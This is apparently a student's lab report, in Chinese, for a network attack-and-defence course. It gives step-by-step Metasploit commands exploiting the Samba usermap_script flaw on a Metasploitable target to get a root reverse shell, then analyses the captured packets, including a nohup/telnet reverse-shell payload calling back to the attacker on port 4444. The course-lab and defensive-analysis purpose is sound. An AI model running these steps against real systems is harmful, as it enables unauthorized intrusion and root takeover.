20212917于欣月 2021-2022-2 《网络攻防实践》第七周作业
20212917于欣月 2021-2022-2 《网络攻防实践》第七周作业
目录
1.实验要求及过程
虚拟机镜像名称 | IP |
---|---|
kali | 192.168.31.226 |
Linux Metaolitable | 192.168.31.147 |
使用Metaspolit作为渗透测试软件,攻击Linux靶机上的Samba服务usermap_script安全漏洞,获取Linux靶机的主机访问权限。
-
使用exploit:exploit/multi/samba/usermap_script渗透攻击模块
-
选择攻击PAYLOAD为远程shell
-
设置攻击参数
-
执行攻击
-
查看是否得到正确的远程shell
-
(1)在kali中输入
msfconsole
,
- (2)输入
use exploit/multi/samba/usermap_script
,使用exploit/multi/samba/usermap_script渗透攻击模块;
- (3)使用
show payloads
,查看payload;再使用set payload cmd/unix/reverse
,最后分别使用set LHOST 192.168.31.226
和set RHOST 192.168.31.147
分别设置攻击机和靶机的IP;最后使用exploit
进行攻击。
- (4)攻击完成后,根据提示输入得到远程shell,再使用ifconfig查询靶机IP,靶机IP成功获取。通过和靶机ifconfig查询结果对比,IP相关信息无误。表明攻击成功。
- (5)通过whoami查询,发现我们已经获得了root权限,而靶机仍然是非root账号登录,这表明提权成功。
攻防对抗实践
- 攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
- 防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
- (1)攻击方:使用usermap_script安全漏洞,攻击2904zk的主机,IP是192.168.11.138,攻击成功,使用whoami查询,发现提权成功。
- (2)防御方:对wireshark所抓包进行分析。
- 第60436条,经过查询可知139号端口是Unix中的Samba服务端口,可知攻击利用了Samba服务漏洞。攻击发起时间是从ARP协议的询问开始,可以确定攻击者IP就是192.168.11.131,靶机IP是192.168.11.133。
- 从第一个SMB数据包中找到shellcode如图所示。其中,nohup是no hang up的缩写,就是不挂断的意思,用nohup运行命令可以使命令永久的执行下去,和用户终端没有关系;telnet 192.168.11.131 4444表明数据是通过4444号通信端口管控传入攻击机的;sh是linux中运行shell的命令,是shell的解释器。
- 对最后一个tcp流分析,可以看到成功攻入的信息,可以发现是借用了python的权限弹出具有高权限的窗口。
2.学习中遇到的问题及解决
- 问题1:在ubuntu的命令行中,无法直接使用wireshark抓包
- 答:说是安装GUI,但是过程比较繁琐,该实验目的只是为了对数据报进行分析,所以为了方便,直接在攻击机方进行抓包。
3.学习感想和体会
- 对数据包的分析能力依旧很弱,当捕捉到大量数据包时,虽然有筛选过滤,但对于需要的结果仍需花费大量时间去查找对应的数据包。